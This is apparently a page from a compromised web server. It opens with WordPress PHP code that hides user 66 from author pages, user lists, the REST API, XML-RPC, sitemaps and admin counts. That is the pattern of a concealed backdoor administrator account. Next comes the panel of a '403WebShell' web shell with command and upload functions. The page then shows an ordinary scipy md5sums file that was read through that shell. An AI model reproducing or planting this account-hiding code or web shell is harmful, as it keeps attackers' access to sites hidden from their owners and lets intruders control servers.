add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/python3-scipy.md5sums
c72246579c4437c07cebb86fbcbc6d90  usr/lib/python3/dist-packages/scipy-1.11.4.dist-info/INSTALLER
a8aa28f5ede34e76b41a4651c258b334  usr/lib/python3/dist-packages/scipy-1.11.4.dist-info/METADATA
2caba1bbd778297e7871b7f814fc33ac  usr/lib/python3/dist-packages/scipy-1.11.4.dist-info/WHEEL
60493697fea5aa2172d6f734c6b90326  usr/lib/python3/dist-packages/scipy/__config__.py
16e661d579de41d798f3f5b3ce7c50f9  usr/lib/python3/dist-packages/scipy/__init__.py
ac5828daa5233d9b1661b9a154a88646  usr/lib/python3/dist-packages/scipy/_distributor_init.py
0c61cdd87e7cfbe7042b62f1729d82e0  usr/lib/python3/dist-packages/scipy/_lib/__init__.py
4e20a2b8f8b781b8f03df75ca6b96253  usr/lib/python3/dist-packages/scipy/_lib/_bunch.py
76a6c17c6063f9ebd8ab3ae36f6c79e4  usr/lib/python3/dist-packages/scipy/_lib/_ccallback.py
f0bdcad51256bc7e49bb299a74c32e91  usr/lib/python3/dist-packages/scipy/_lib/_ccallback_c.cpython-312-aarch64-linux-gnu.so
563b9038d4cb10e6316eaf813eac4cb9  usr/lib/python3/dist-packages/scipy/_lib/_disjoint_set.py
4de2630d7e1a0cd58a232082e7af1057  usr/lib/python3/dist-packages/scipy/_lib/_docscrape.py
5b9951ff8f70af2001ea94a3e205bd1c  usr/lib/python3/dist-packages/scipy/_lib/_finite_differences.py
9a6490663a0cf97e99465ce674902784  usr/lib/python3/dist-packages/scipy/_lib/_fpumode.cpython-312-aarch64-linux-gnu.so
330def9e2b9648be0b9a61867b18441b  usr/lib/python3/dist-packages/scipy/_lib/_gcutils.py
8cc1c062b7ed3b5baec126403f31ade9  usr/lib/python3/dist-packages/scipy/_lib/_pep440.py
ca787ad6bcd47f49d8edcbf0389f06e4  usr/lib/python3/dist-packages/scipy/_lib/_test_ccallback.cpython-312-aarch64-linux-gnu.so
f593aea5d374fa5a4419faa707120504  usr/lib/python3/dist-packages/scipy/_lib/_test_deprecation_call.cpython-312-aarch64-linux-gnu.so
0c37255570b3f7180b94082f7f235188  usr/lib/python3/dist-packages/scipy/_lib/_test_deprecation_def.cpython-312-aarch64-linux-gnu.so
2ca98e64f48572d326f6f6f073eae120  usr/lib/python3/dist-packages/scipy/_lib/_testutils.py
d43ce700072a9d8c7569147ced6cb0ce  usr/lib/python3/dist-packages/scipy/_lib/_threadsafety.py
0a5b672684b795b26ae2bbb204a6047b  usr/lib/python3/dist-packages/scipy/_lib/_tmpdirs.py
785bcc9127bd3157d67fa9ed552bddd4  usr/lib/python3/dist-packages/scipy/_lib/_uarray/LICENSE
dbc9a2e5efc905ecc8fb11bafbba1b9d  usr/lib/python3/dist-packages/scipy/_lib/_uarray/__init__.py
66b0be8f307f1832ade7a27350975469  usr/lib/python3/dist-packages/scipy/_lib/_uarray/_backend.py
55235540bc7b1f0d536417b811fdc01b  usr/lib/python3/dist-packages/scipy/_lib/_uarray/_uarray.cpython-312-aarch64-linux-gnu.so
2716796f00db4a813e0395163d186b13  usr/lib/python3/dist-packages/scipy/_lib/_util.py
45344cd373140a967fda458d3f793b0b  usr/lib/python3/dist-packages/scipy/_lib/decorator.py
49133340149685a34ac5d288221ad3c2  usr/lib/python3/dist-packages/scipy/_lib/deprecation.py
4897e9421ec3e97c1cfc16fc7f6f6e4c  usr/lib/python3/dist-packages/scipy/_lib/doccer.py
10af34f1fb4511c28a56d2eeccb570ec  usr/lib/python3/dist-packages/scipy/_lib/messagestream.cpython-312-aarch64-linux-gnu.so
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/_lib/tests/__init__.py
d4d2f28d91a70ce75e6f14356d2d6bdc  usr/lib/python3/dist-packages/scipy/_lib/tests/test__gcutils.py
aee22ec07f5979dc09123d2f76c10e6e  usr/lib/python3/dist-packages/scipy/_lib/tests/test__pep440.py
6f1f53da39aa3b39bec97a03fbc8cbf2  usr/lib/python3/dist-packages/scipy/_lib/tests/test__testutils.py
c03070611639b21d7ea64af1c74b7401  usr/lib/python3/dist-packages/scipy/_lib/tests/test__threadsafety.py
8bff9e21712ab8d598c6b60f90257d4d  usr/lib/python3/dist-packages/scipy/_lib/tests/test__util.py
0e32c2eb11f605907c4383df02ebdaec  usr/lib/python3/dist-packages/scipy/_lib/tests/test_bunch.py
07327fdff9e36067608761898ca9ef98  usr/lib/python3/dist-packages/scipy/_lib/tests/test_ccallback.py
f9c94bbb5bbcf392d9335609289a160c  usr/lib/python3/dist-packages/scipy/_lib/tests/test_deprecation.py
7c6f3a3709d0401bf38b52c53a6b9747  usr/lib/python3/dist-packages/scipy/_lib/tests/test_import_cycles.py
010df2fe7aada72c63a75f6051f59db2  usr/lib/python3/dist-packages/scipy/_lib/tests/test_public_api.py
612bed6becb39f7f90f60ce601570595  usr/lib/python3/dist-packages/scipy/_lib/tests/test_scipy_version.py
85083f5ef53e91a16f2650546761d475  usr/lib/python3/dist-packages/scipy/_lib/tests/test_tmpdirs.py
759bfb3b5d839163db58fba97c16ab93  usr/lib/python3/dist-packages/scipy/_lib/tests/test_warnings.py
1b8a10af7d2e4071ac8ef92a8dab35f1  usr/lib/python3/dist-packages/scipy/_lib/uarray.py
0b2b0f06b001f26dd599ea04248339a5  usr/lib/python3/dist-packages/scipy/cluster/__init__.py
06f7e6e0d159523b39d1f0d335360e28  usr/lib/python3/dist-packages/scipy/cluster/_hierarchy.cpython-312-aarch64-linux-gnu.so
ffc4b51c836d3a1c99b48fa3ec120b46  usr/lib/python3/dist-packages/scipy/cluster/_optimal_leaf_ordering.cpython-312-aarch64-linux-gnu.so
5c4e08140d03cfdd313045c5318c4445  usr/lib/python3/dist-packages/scipy/cluster/_vq.cpython-312-aarch64-linux-gnu.so
f0828c9795f4d04a7b0a04e69f5b05d4  usr/lib/python3/dist-packages/scipy/cluster/hierarchy.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/cluster/tests/__init__.py
fa2f5480e1edadc71f15c981b58d5342  usr/lib/python3/dist-packages/scipy/cluster/tests/hierarchy_test_data.py
b7e018dc9177e2c95ba334a2350fa112  usr/lib/python3/dist-packages/scipy/cluster/tests/test_disjoint_set.py
cbd14cf04804925183a2f839838802e9  usr/lib/python3/dist-packages/scipy/cluster/tests/test_hierarchy.py
388525e02546fbb14c4c98b111ddfa4d  usr/lib/python3/dist-packages/scipy/cluster/tests/test_vq.py
c93e48aa0bbdb4b95f67e6ff8529e2d4  usr/lib/python3/dist-packages/scipy/cluster/vq.py
bb99522120c2e006bfef331758560d49  usr/lib/python3/dist-packages/scipy/conftest.py
b5e783ca8b23f3adb5a5b9d54ca8ff01  usr/lib/python3/dist-packages/scipy/constants/__init__.py
12af4fc00d7df901b92b07519eff2554  usr/lib/python3/dist-packages/scipy/constants/_codata.py
1e6ac55e2d6e7b1d5ec0ef2a04bbe567  usr/lib/python3/dist-packages/scipy/constants/_constants.py
b2e9839a02c37dd5f2f5c202a5ab734f  usr/lib/python3/dist-packages/scipy/constants/codata.py
6f484bf5d604fd10ab5f21f3f2a69a36  usr/lib/python3/dist-packages/scipy/constants/constants.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/constants/tests/__init__.py
0a7e3fc0bbb228733a265b80fa4e239c  usr/lib/python3/dist-packages/scipy/constants/tests/test_codata.py
8d8bd58a990c28cd736f63fddf82d315  usr/lib/python3/dist-packages/scipy/constants/tests/test_constants.py
a990553f4b1e43c2b9e2c32ba5eeb97e  usr/lib/python3/dist-packages/scipy/datasets/__init__.py
42b2bae52f3c6dbfb9e364cfcba80867  usr/lib/python3/dist-packages/scipy/datasets/_download_all.py
5bf7227963bd55c796723f1de92355d0  usr/lib/python3/dist-packages/scipy/datasets/_fetchers.py
664422ef705e75a5651ff4fa99b55f23  usr/lib/python3/dist-packages/scipy/datasets/_registry.py
a9772f245176e6b73d9052ac482bf62c  usr/lib/python3/dist-packages/scipy/datasets/_utils.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/datasets/tests/__init__.py
54417298de00c889ae5bc742067daf6a  usr/lib/python3/dist-packages/scipy/datasets/tests/test_data.py
209386a61c02317305556cc11ef80229  usr/lib/python3/dist-packages/scipy/fft/__init__.py
da2143821f45a1844e01d490be5515ec  usr/lib/python3/dist-packages/scipy/fft/_backend.py
52df700dead3e742ba9f3def13c09d6f  usr/lib/python3/dist-packages/scipy/fft/_basic.py
81fc088f83a70207c5fc4d0068641919  usr/lib/python3/dist-packages/scipy/fft/_debug_backends.py
6f0fe9c08dba79233794a04425903732  usr/lib/python3/dist-packages/scipy/fft/_fftlog.py
031ca4b4461f28ff70cc823db22ca49c  usr/lib/python3/dist-packages/scipy/fft/_fftlog_multimethods.py
127b62f17e25a9ecdf5a013bd36ddcae  usr/lib/python3/dist-packages/scipy/fft/_helper.py
6a98c867d6c3e06afef9ac46fec0be7a  usr/lib/python3/dist-packages/scipy/fft/_pocketfft/LICENSE.md
bf56fd84b3925d617c388b5d835254b1  usr/lib/python3/dist-packages/scipy/fft/_pocketfft/__init__.py
6c72c8d30f22cad91c210874803d1d2e  usr/lib/python3/dist-packages/scipy/fft/_pocketfft/basic.py
b0bba98df76e8b26d2f0a9417cd7127c  usr/lib/python3/dist-packages/scipy/fft/_pocketfft/helper.py
6189e11cbc21f7aab361e0a47f2d31be  usr/lib/python3/dist-packages/scipy/fft/_pocketfft/pypocketfft.cpython-312-aarch64-linux-gnu.so
5545a77b165fba427ae1898411cf7cba  usr/lib/python3/dist-packages/scipy/fft/_pocketfft/realtransforms.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/fft/_pocketfft/tests/__init__.py
7432cf67c7246e5011103a7b144d9398  usr/lib/python3/dist-packages/scipy/fft/_pocketfft/tests/test_basic.py
096b4a6dc351efbd6ea7cdb40c48cfbf  usr/lib/python3/dist-packages/scipy/fft/_pocketfft/tests/test_real_transforms.py
e1472464f1ea1fddd92caaa7f311f7a2  usr/lib/python3/dist-packages/scipy/fft/_realtransforms.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/fft/tests/__init__.py
02ae84f02f3c610fe3fe93d399d93f9d  usr/lib/python3/dist-packages/scipy/fft/tests/mock_backend.py
e7c4c6bbcd3813a0d068a1306b80d8a7  usr/lib/python3/dist-packages/scipy/fft/tests/test_backend.py
cbd53e5589f7910882215b534ff7573d  usr/lib/python3/dist-packages/scipy/fft/tests/test_fft_function.py
ae828a875ee863078e4e0fb69793949c  usr/lib/python3/dist-packages/scipy/fft/tests/test_fftlog.py
14f96b991152effcecebaf5b274797ec  usr/lib/python3/dist-packages/scipy/fft/tests/test_helper.py
972245021648296af3b6c6127bc15933  usr/lib/python3/dist-packages/scipy/fft/tests/test_multithreading.py
a43282b89642966ee6d13f31932626b3  usr/lib/python3/dist-packages/scipy/fft/tests/test_numpy.py
6e4dde862b78b73508e935d5ff910737  usr/lib/python3/dist-packages/scipy/fft/tests/test_real_transforms.py
e9b25a16f8e02ae6f8c85daa21339c1a  usr/lib/python3/dist-packages/scipy/fftpack/__init__.py
580e122b3311b642610edeb5f6b0298c  usr/lib/python3/dist-packages/scipy/fftpack/_basic.py
d1ad5b5227f0823fed949baf26a86267  usr/lib/python3/dist-packages/scipy/fftpack/_helper.py
7778960ab0db53e80112830c0a9410de  usr/lib/python3/dist-packages/scipy/fftpack/_pseudo_diffs.py
92c51d34f27d7888ae8e53c86786332c  usr/lib/python3/dist-packages/scipy/fftpack/_realtransforms.py
800846daeb92de64085184052f3a01d8  usr/lib/python3/dist-packages/scipy/fftpack/basic.py
5adf243e8611b0795ee6e3816c14af5c  usr/lib/python3/dist-packages/scipy/fftpack/convolve.cpython-312-aarch64-linux-gnu.so
71108f02ff679433038ea164bb844aee  usr/lib/python3/dist-packages/scipy/fftpack/helper.py
ce8c9f189ad27e5f7b0ae4cbfe69b853  usr/lib/python3/dist-packages/scipy/fftpack/pseudo_diffs.py
b712cff6233e1a9fa43e7970025c37f3  usr/lib/python3/dist-packages/scipy/fftpack/realtransforms.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/fftpack/tests/__init__.py
dc3b2d23bad8ec9dea140e340cf5931a  usr/lib/python3/dist-packages/scipy/fftpack/tests/fftw_double_ref.npz
9d99686268a12fa06682a04407cfa850  usr/lib/python3/dist-packages/scipy/fftpack/tests/fftw_longdouble_ref.npz
f37eff6ca29caa574db7274a09f4a5c2  usr/lib/python3/dist-packages/scipy/fftpack/tests/fftw_single_ref.npz
b8adbaaba1331f451b25ef1beb39e203  usr/lib/python3/dist-packages/scipy/fftpack/tests/test.npz
8e5d58bdb351a96b8ee859594e245971  usr/lib/python3/dist-packages/scipy/fftpack/tests/test_basic.py
da3196e501ceaef05abcc08b05dbcb42  usr/lib/python3/dist-packages/scipy/fftpack/tests/test_helper.py
c1270c4cc7edbb1fc2f7490b88353604  usr/lib/python3/dist-packages/scipy/fftpack/tests/test_import.py
a2c381c46024da8363462f85026edc64  usr/lib/python3/dist-packages/scipy/fftpack/tests/test_pseudo_diffs.py
93a18da0a4fb64a30048dfb68b077d31  usr/lib/python3/dist-packages/scipy/fftpack/tests/test_real_transforms.py
22cea987765880969d94f009742db5e0  usr/lib/python3/dist-packages/scipy/integrate/__init__.py
a6835808bdc4ae6b33977b5c88753b5c  usr/lib/python3/dist-packages/scipy/integrate/_bvp.py
501be624a44545d0f4eff34636c48b2c  usr/lib/python3/dist-packages/scipy/integrate/_dop.cpython-312-aarch64-linux-gnu.so
726f2f3716ae4e8c843d287bd7f57a73  usr/lib/python3/dist-packages/scipy/integrate/_ivp/__init__.py
e9ce45bf6b0fb86be17ef2a61e35a43e  usr/lib/python3/dist-packages/scipy/integrate/_ivp/base.py
4e88320812445d62b4677e83167c1643  usr/lib/python3/dist-packages/scipy/integrate/_ivp/bdf.py
20711110a758c3f91d1e70a688731f9f  usr/lib/python3/dist-packages/scipy/integrate/_ivp/common.py
796c0cee4fe163821adce333ce4ae2bf  usr/lib/python3/dist-packages/scipy/integrate/_ivp/dop853_coefficients.py
563eb75e16582102b69056e4a6ed9724  usr/lib/python3/dist-packages/scipy/integrate/_ivp/ivp.py
fc430738ac6bf09c1c28df9edf4b30f5  usr/lib/python3/dist-packages/scipy/integrate/_ivp/lsoda.py
a86d3eb1b983a35c76f8318dc0a3dbd7  usr/lib/python3/dist-packages/scipy/integrate/_ivp/radau.py
80a10480eecfd3bcb9ac30a0979144ca  usr/lib/python3/dist-packages/scipy/integrate/_ivp/rk.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/integrate/_ivp/tests/__init__.py
662989aaf64295afa11488b7ee97b922  usr/lib/python3/dist-packages/scipy/integrate/_ivp/tests/test_ivp.py
b42504ebeef4b1e4b3c48aa23a2c574d  usr/lib/python3/dist-packages/scipy/integrate/_ivp/tests/test_rk.py
b3b09fe4e2735800f57fd706aedebb46  usr/lib/python3/dist-packages/scipy/integrate/_lsoda.cpython-312-aarch64-linux-gnu.so
0625c6b714c1301365ec98002cf96d6f  usr/lib/python3/dist-packages/scipy/integrate/_ode.py
47e243b300836e1219c24bee4fac7e43  usr/lib/python3/dist-packages/scipy/integrate/_odepack.cpython-312-aarch64-linux-gnu.so
0bb403e6c2bed3a368fdbcc8967f6472  usr/lib/python3/dist-packages/scipy/integrate/_odepack_py.py
5a1f2ae30839f16a5c0d5a03670da123  usr/lib/python3/dist-packages/scipy/integrate/_quad_vec.py
872bd5df73a2a705f5f4c5847eb3b9cf  usr/lib/python3/dist-packages/scipy/integrate/_quadpack.cpython-312-aarch64-linux-gnu.so
1dbb9c0fac526098abff2332ef9761b8  usr/lib/python3/dist-packages/scipy/integrate/_quadpack_py.py
822dd1dee89fdf299be7e4c8a9b98255  usr/lib/python3/dist-packages/scipy/integrate/_quadrature.py
4ab4cfec84476c96f74b6a27200d0c04  usr/lib/python3/dist-packages/scipy/integrate/_test_multivariate.cpython-312-aarch64-linux-gnu.so
829e9f6beb09a05f0e0d3009ab5d8633  usr/lib/python3/dist-packages/scipy/integrate/_test_odeint_banded.cpython-312-aarch64-linux-gnu.so
e25e3be6f92b69b92b84ab7f9f677391  usr/lib/python3/dist-packages/scipy/integrate/_vode.cpython-312-aarch64-linux-gnu.so
9958cd37b275c21bde30b3244d8dcd73  usr/lib/python3/dist-packages/scipy/integrate/dop.py
2fcde2ef074c4f0da4d615fef0d1d0a5  usr/lib/python3/dist-packages/scipy/integrate/lsoda.py
70bf13f62075e6b6985459a23bf272cd  usr/lib/python3/dist-packages/scipy/integrate/odepack.py
a6fcbab98a21930908ffd364e0b149ae  usr/lib/python3/dist-packages/scipy/integrate/quadpack.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/integrate/tests/__init__.py
c1e8bb28d024ee17b275fc884c9971b6  usr/lib/python3/dist-packages/scipy/integrate/tests/test__quad_vec.py
d47787e8c6730df779a1060e07f4409f  usr/lib/python3/dist-packages/scipy/integrate/tests/test_banded_ode_solvers.py
e0dd0cec05da74ca35fa4f5d1e1bc79a  usr/lib/python3/dist-packages/scipy/integrate/tests/test_bvp.py
71121621f1352ecca63cf40549bcdd30  usr/lib/python3/dist-packages/scipy/integrate/tests/test_integrate.py
9066399908fe873891dc03551c6b6a05  usr/lib/python3/dist-packages/scipy/integrate/tests/test_odeint_jac.py
f0d2b44cd698d4bac6888314cdad0933  usr/lib/python3/dist-packages/scipy/integrate/tests/test_quadpack.py
cd8f1ec9b258fdeaa11ee8820ad2682c  usr/lib/python3/dist-packages/scipy/integrate/tests/test_quadrature.py
48ab3a63abf6a061cd5db7ec1ab4dd2d  usr/lib/python3/dist-packages/scipy/integrate/vode.py
b55a028ed14f10a3649c3181e8d64716  usr/lib/python3/dist-packages/scipy/interpolate/__init__.py
3eabdcc59c37ecd40fc4324a95102409  usr/lib/python3/dist-packages/scipy/interpolate/_bspl.cpython-312-aarch64-linux-gnu.so
38917b86d33093d890d528ec3dc3ae30  usr/lib/python3/dist-packages/scipy/interpolate/_bsplines.py
f78467543dcd27f25317ba224a8d4dc7  usr/lib/python3/dist-packages/scipy/interpolate/_cubic.py
180c376c5a64c4930b9dd73c22f7f6d5  usr/lib/python3/dist-packages/scipy/interpolate/_fitpack.cpython-312-aarch64-linux-gnu.so
0529ba5dc1341b81bfb0499c1e302f17  usr/lib/python3/dist-packages/scipy/interpolate/_fitpack2.py
3dd9958f040b2e160737c26a3b39ea45  usr/lib/python3/dist-packages/scipy/interpolate/_fitpack_impl.py
413b4c2c002ffc18bf072b35851dd5ab  usr/lib/python3/dist-packages/scipy/interpolate/_fitpack_py.py
74e692292b7b8063661af866f2b653d8  usr/lib/python3/dist-packages/scipy/interpolate/_interpnd_info.py
708a306d3be4c65e1735ed9380523358  usr/lib/python3/dist-packages/scipy/interpolate/_interpolate.py
601b38e658fc0b5278da387b6d7720a9  usr/lib/python3/dist-packages/scipy/interpolate/_ndgriddata.py
137940d4c4ceff0573cf0b64d72b9415  usr/lib/python3/dist-packages/scipy/interpolate/_pade.py
f6eb406d3fd13eedacd5540e70248154  usr/lib/python3/dist-packages/scipy/interpolate/_polyint.py
ce42785893f17c93d1445a51019e81d4  usr/lib/python3/dist-packages/scipy/interpolate/_ppoly.cpython-312-aarch64-linux-gnu.so
9ed5b612393e4fd8300ea091e1103847  usr/lib/python3/dist-packages/scipy/interpolate/_rbf.py
48718e86464101d57d584e60a5605d2c  usr/lib/python3/dist-packages/scipy/interpolate/_rbfinterp.py
3df36b02bf086f025415dc16ed946721  usr/lib/python3/dist-packages/scipy/interpolate/_rbfinterp_pythran.cpython-312-aarch64-linux-gnu.so
4a1cb6159f837d007869ab78cf9069d2  usr/lib/python3/dist-packages/scipy/interpolate/_rgi.py
a87ba153a523698e420c52e63c20f672  usr/lib/python3/dist-packages/scipy/interpolate/_rgi_cython.cpython-312-aarch64-linux-gnu.so
d03013f51ac32c395c63c45d68a8d87f  usr/lib/python3/dist-packages/scipy/interpolate/dfitpack.cpython-312-aarch64-linux-gnu.so
78d4d28a313c8975e0e2a198265cea75  usr/lib/python3/dist-packages/scipy/interpolate/fitpack.py
1118b1e6e1c27a28f74154aad3556f27  usr/lib/python3/dist-packages/scipy/interpolate/fitpack2.py
57cb462d188087dcd605893dae3113e3  usr/lib/python3/dist-packages/scipy/interpolate/interpnd.cpython-312-aarch64-linux-gnu.so
9f046aca00460c795aea0fe9fcbb3f6d  usr/lib/python3/dist-packages/scipy/interpolate/interpolate.py
a177a410b8828aa9b77956514fa81417  usr/lib/python3/dist-packages/scipy/interpolate/ndgriddata.py
27060c3dbff7461d95d85e21b8c1be0c  usr/lib/python3/dist-packages/scipy/interpolate/polyint.py
2977b39e1f8a2c63bbfbe80dd19d84fb  usr/lib/python3/dist-packages/scipy/interpolate/rbf.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/interpolate/tests/__init__.py
4a040a44ac1c9451e86a900b1a200acd  usr/lib/python3/dist-packages/scipy/interpolate/tests/data/bug-1310.npz
6e7d35369d4c1651458c8e007277391f  usr/lib/python3/dist-packages/scipy/interpolate/tests/data/estimate_gradients_hang.npy
f4894c18972fce36f380a2791c304366  usr/lib/python3/dist-packages/scipy/interpolate/tests/data/gcvspl.npz
a485e97f3cfa3a3c2448104c3e877c0a  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_bsplines.py
38e1bb359968d9ff0bbfae3c7eb9ad76  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_fitpack.py
ac894ac706d421cf1063071b89e1662c  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_fitpack2.py
ab40da9373a91c30d3c6315706920e3b  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_gil.py
69f95b34c9ebdbceae92bcf9a3d845b0  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_interpnd.py
acd1791395046ab03fa02a49279178b4  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_interpolate.py
ac7f4f024166682a8d6218435a7f36a1  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_ndgriddata.py
df5c11a226a05982d4339422818037c2  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_pade.py
2111e3deab207867e8d2b27508de505b  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_polyint.py
e1aa7822ae298e203c6d1ecb55e1675d  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_rbf.py
3bcbd6846e88cece2cc66205467705b7  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_rbfinterp.py
22383ec370ba9e461b7856c0ba0b8f2a  usr/lib/python3/dist-packages/scipy/interpolate/tests/test_rgi.py
27517c39d4d0ef49194cdf9d2be94932  usr/lib/python3/dist-packages/scipy/io/__init__.py
d5ea9bd3a362652a5198ee66aa1c02ec  usr/lib/python3/dist-packages/scipy/io/_fortran.py
80d74bc096dad5f4018a25c502a3bc0b  usr/lib/python3/dist-packages/scipy/io/_harwell_boeing/__init__.py
f3673799517c4ed3563c58838f5a2c15  usr/lib/python3/dist-packages/scipy/io/_harwell_boeing/_fortran_format_parser.py
1fc98a03ab55297dfcad5093e957e551  usr/lib/python3/dist-packages/scipy/io/_harwell_boeing/hb.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/io/_harwell_boeing/tests/__init__.py
18f29c2344f939e238b4f9c92cf1f9b7  usr/lib/python3/dist-packages/scipy/io/_harwell_boeing/tests/test_fortran_format.py
ef559dfaeed9f7ecd20153dbabc2876d  usr/lib/python3/dist-packages/scipy/io/_harwell_boeing/tests/test_hb.py
f3e48f8ebaef166447686baaa1f4bd21  usr/lib/python3/dist-packages/scipy/io/_idl.py
20f8a0f2c9afa7a4342ab6ce13736aef  usr/lib/python3/dist-packages/scipy/io/_mmio.py
4f000f07f0aae2373b22cc0a5f9fe534  usr/lib/python3/dist-packages/scipy/io/_netcdf.py
63f162f5abef1b11086afe4a3ba21d8b  usr/lib/python3/dist-packages/scipy/io/_test_fortran.cpython-312-aarch64-linux-gnu.so
013fcc13f5c807cd466725346025c281  usr/lib/python3/dist-packages/scipy/io/arff/__init__.py
1e81f575c9bff1247d4b654a5ddfa8a1  usr/lib/python3/dist-packages/scipy/io/arff/_arffread.py
d37ea4e7e864123bd225b1c982f711f5  usr/lib/python3/dist-packages/scipy/io/arff/arffread.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/io/arff/tests/__init__.py
25d7d5d689042a3816aa1598d5fd56ef  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/iris.arff
aff738e7dd42e57c778657a7ac18ae67  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/missing.arff
69f6d34b65810e8a3da6dd46f851a12f  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/nodata.arff
fc66e9384f6a842a9d743b63fe7a1eb1  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/quoted_nominal.arff
bf782bc1b680511be876967cd8dd189f  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/quoted_nominal_spaces.arff
9d9d3d17b548939f7f65cdf19e0890bc  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test1.arff
33fd78d27c8b86f93cba6cef2a673a3b  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test10.arff
9f1ab4b06877e98334710df1fa631997  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test11.arff
a781a6cef8f387548e24699ae9cea84f  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test2.arff
68b9855e619c6176e1f7013838757aa2  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test3.arff
dce59e892d44ff9a46d22e02950f6827  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test4.arff
8d9d4d8ab5127c13d2f20c419604aa5e  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test5.arff
df0ada79c27a2df2028c5825c2a83664  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test6.arff
154de5e15e8a662cdbfebd923d236466  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test7.arff
1f28da3a81638e1986747783a6b6dac6  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test8.arff
80b1eac42abfc2f36d76917ca31431d3  usr/lib/python3/dist-packages/scipy/io/arff/tests/data/test9.arff
